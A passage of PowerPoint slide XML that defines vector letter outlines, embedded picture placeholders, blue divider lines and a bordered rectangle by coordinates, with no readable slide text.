                  <a:lnTo>
                    <a:pt x="221068" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="143713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="142265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="140804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="138442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="135166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221068" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="115912" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186194" y="1015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186664" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187070" y="2616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187477" y="3555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="4800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="6362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188150" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="9817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="12052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="14287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188150" y="16167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="17691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="19215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="23329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183883" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184162" y="65303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184581" y="66192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184873" y="67386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185064" y="68872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185242" y="70357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="72212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="74447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="76682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184162" y="83718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183756" y="84683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183299" y="85369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182778" y="85775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182257" y="86194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136448" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136004" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135559" y="142913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134759" y="143408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133604" y="143827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132448" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130949" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129082" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127228" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124840" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121945" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116751" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114846" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112953" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107937" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107441" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108038" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109715" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111391" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113461" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115912" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="object 101"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId27" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="629646" y="3800995"/>
              <a:ext cx="532206" cy="156451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="object 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="166033" y="3804437"/>
              <a:ext cx="234315" cy="149860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="166204" y="1892"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170599" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174104" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185915" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186550" y="5499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187083" y="6616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187528" y="8039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232181" y="136067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233070" y="138747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233629" y="140868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233857" y="142430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234073" y="143992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233781" y="145160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232956" y="145935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232143" y="146723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230695" y="147205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228612" y="147396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226529" y="147573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223659" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220014" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216217" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203936" y="145440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203492" y="144843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203123" y="144068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202819" y="143090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193116" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138861" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129705" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129412" y="143357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129019" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128536" y="144932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128054" y="145643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127279" y="146202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126199" y="146608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125120" y="147015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123596" y="147294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121615" y="147446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119646" y="147599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117055" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113855" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110439" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107759" y="147561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105829" y="147332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103885" y="147116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102552" y="146570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101803" y="145719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101066" y="144868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100799" y="143649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101028" y="142087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101244" y="140525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147231" y="7696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151650" y="2844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152946" y="2438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154749" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157060" y="2057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159359" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162420" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166204" y="1892"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="50901" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54317" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57746" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64592" y="1295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78689" y="5918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81000" y="7023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84772" y="10604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85039" y="11125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="18821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="20764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="22910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85890" y="24739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85775" y="26225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85661" y="27711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85483" y="28943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="29908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84962" y="30873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84594" y="31584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84099" y="32029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83616" y="32473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82969" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82156" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81330" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="32181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78244" y="31140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76453" y="30098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74269" y="28968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71653" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69049" y="26504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66039" y="25387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62623" y="24383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59194" y="23380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55435" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51346" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48145" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45351" y="23266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42976" y="24053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40589" y="24828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38595" y="25907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36995" y="27292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35394" y="28663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34213" y="30314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33426" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32651" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="36233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="38392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="41592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41909" y="52958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44856" y="54787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48183" y="56502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51904" y="58089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55625" y="59689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87503" y="80568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="97891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="103695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="111277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78574" y="138010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73748" y="141846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68084" y="144729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61607" y="146672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55143" y="148602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48221" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40855" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35864" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31229" y="149161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26949" y="148335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22682" y="147523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679" y="138404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="137439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015" y="136042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609" y="134226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="132397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="116751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282" y="115785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="115100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844" y="114274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5283" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6756" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8648" y="115912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10540" y="117144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12979" y="118503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15963" y="119989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18935" y="121475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22491" y="122834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26619" y="124066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30746" y="125298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35534" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40957" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44538" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57759" y="120992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59728" y="119430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61239" y="117500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62280" y="115188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63322" y="112877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="110312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="107492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="104216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62953" y="101409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="99059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59385" y="96723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57061" y="94627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54190" y="92811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51320" y="90982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48069" y="89280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44424" y="87680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40779" y="86080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6921" y="61467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="47663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="41630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="34709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16687" y="10325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21043" y="6857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26174" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32092" y="2565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38011" y="850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44272" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50901" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="object 103"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId28" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="25907" y="4038579"/>
              <a:ext cx="2572499" cy="111247"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104" name="object 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="67561" y="4072249"/>
              <a:ext cx="2486660" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2486660">
                  <a:moveTo>
                    <a:pt x="2486139" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="105" name="object 105"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId29" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="33528" y="4552188"/>
              <a:ext cx="2578607" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="object 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="74416" y="4585586"/>
              <a:ext cx="2493010" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2493010">
                  <a:moveTo>
                    <a:pt x="2492794" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="107" name="object 107"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId30" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132075" y="4869180"/>
              <a:ext cx="441959" cy="225551"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="108" name="object 108"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId31" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4636008"/>
              <a:ext cx="2074151" cy="451103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="object 109"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="121627" y="4658652"/>
              <a:ext cx="1980564" cy="356235"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1980564" h="356235">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1980323" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1980323" y="356184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="356184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
